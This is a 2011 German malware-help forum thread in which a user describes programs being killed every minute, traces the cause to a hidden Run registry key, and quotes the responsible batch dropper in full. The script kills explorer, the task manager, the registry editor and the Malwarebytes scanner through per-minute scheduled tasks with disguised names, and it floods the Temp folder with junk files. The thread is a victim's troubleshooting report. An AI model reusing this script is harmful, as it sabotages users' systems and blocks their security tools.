Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Explorer.exe, Firefox.exe u. Ähn. werden jede Minute gekillt (https://www.trojaner-board.de/101511-explorer-exe-firefox-exe-u-aehn-minute-gekillt.html)

Spixi 19.07.2011 21:07

Explorer.exe, Firefox.exe u. Ähn. werden jede Minute gekillt
 
Hallo, mindestens einmal die Minute ploppen bei mir mehrere Kommandozeilenfenster auf mit dem Titel C:\WINDOWS\System32\svchost.exe und dem Kommando Taskkill /f /IM *
Für * stehen dort jeweils andere Programme, z. B. cmd.exe, explorer.exe, taskmgr oder mbam.exe

command.com ließ sich zum Glück ausführen, habe direkt firefox.exe in firebird.exe und Malewarebytes mbam.exe in mbam1.exe umbenannt, so funktionieren sie wenigstens. GMER und Malewarebytes Scans folgen :)

Spixi 19.07.2011 21:32

Hier kommt der MBAM-Log

Spixi 19.07.2011 21:44

Und der Gmer-Log. Noch kein Ergebnis, HILFE!!!

Spixi 19.07.2011 21:53

Kann mir denn keiner helfen? Das mit den schwarzen Fenstern nervt, die kommen immer wieder und ich habe immer noch keine Taskleiste, keinen Desktop und muss immer mit Alt-Tab auf COMMAND.COM switchen, um ein Programm zu starten...

Spixi 20.07.2011 20:09

Ich habe das Problem gefunden!

Im HKLM/Software/Microsoft/Windows/CurrentVersion/Run/ hatte sich doch eiskalt ein Schlüssel mit dem Namen "Default" und dem Wert "0*(0x000000)***************************************************************************************************************************************** *********************************.bat", also statt "*" war dort ein Alt-255-Leerzeichen, eingeschlichen, habe nach dieser Datei gesucht, sie war in C:\Windows\system32 und zwar ein Batch-Script mit folgendem Inhalt, scheint ein sehr billiger Dropper gewesen zu sein, gelöscht, Gefahr erkannt, Gefahr gebannt!


Zitat:

@echo off
Echo Taskkill /f /IM Explorer.exe > PresentationFontCache.cmd
Echo Taskkill /f /IM Iexplore.exe > appwiz.cmd
Echo Taskkill /f /IM mbam.exe > command.cmd
Echo Taskkill /f /IM cmd.exe > rundll32.cmd
Echo Taskkill /f /IM firefox.exe > svchost.cmd
Echo Taskkill /f /IM taskmgr > lsass.cmd
Echo Taskkill /f /IM powershell.exe > win32.cmd
Echo Taskkill /f /IM regedit.exe > crss.cmd
Echo j | Schtasks /Delete *
For %%i in ( PresentationFontCache appwiz command rundll32 svchost win32 lsass crss ) Do More passwd.catched | Schtasks /Create /TR %%i.cmd /TN %%i /SC Minute /MO 1
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk
Echo.>%Temp%\%Random%.chk


Alle Zeitangaben in WEZ +1. Es ist jetzt 03:19 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131